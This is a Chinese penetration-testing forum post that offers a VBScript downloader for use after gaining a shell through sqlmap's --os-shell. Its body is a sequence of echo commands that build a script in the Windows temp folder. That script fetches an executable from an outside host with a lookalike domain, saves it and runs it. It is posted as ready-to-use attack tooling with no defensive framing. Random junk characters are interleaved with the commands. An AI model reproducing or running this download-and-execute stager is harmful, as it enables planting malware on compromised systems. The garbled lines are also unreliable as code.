中国网络渗透测试联盟

标题: vbs下载者,适合sqlmap --os-shell使用 [打印本页]
作者: admin    时间: 2016-4-12 16:08
标题: vbs下载者,适合sqlmap --os-shell使用
echo ^Set Post = CreateObject("Msxml2.XMLHTTP")^ >>c:\windows\temp\666999.txt
, o- D6 a( r' P/ F$ ]7 N0 Lecho ^Set Shell = CreateObject("Wscript.Shell")^ >>c:\windows\temp\666999.txt! F1 [& @1 {) |3 s* v5 o
echo ^Post.Open "GET","http://www.baido.hk/server.exe",0^ >>c:\windows\temp\666999.txt' w  r2 Z3 e0 t+ l
echo ^Post.Send()^ >>c:\windows\temp\666999.txt9 [% _0 i2 J; `2 t
echo ^Set aGet = CreateObject("ADODB.Stream")^ >>c:\windows\temp\666999.txt- K% T1 X) _6 x! X5 }
echo ^aGet.Mode = 3^ >>c:\windows\temp\666999.txt3 d6 S6 U5 e' e  \5 f5 i. {
echo ^aGet.Type = 1^ >>c:\windows\temp\666999.txt3 S! k) H$ N* F% f
echo ^aGet.Open()^ >>c:\windows\temp\666999.txt% V2 x) J7 l6 |) }! Q! d9 I) F
echo ^aGet.Write(Post.responseBody)^ >>c:\windows\temp\666999.txt
; t6 @: R3 F3 P0 D/ Pecho ^aGet.SaveToFile "c:\windows\temp\3.exe",2^ >>c:\windows\temp\666999.txt
" v/ P( C! `- X/ v/ w" qecho ^wscript.sleep 1000^ >>c:\windows\temp\666999.txt3 c3 g  G: Q* n, d# I* |9 k, w
echo ^Shell.Run ("c:\windows\temp\3.exe")^ >>c:\windows\temp\666999.txt% V+ O. O. n4 F) u6 b
+ t+ B# z) S* J$ W5 E




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2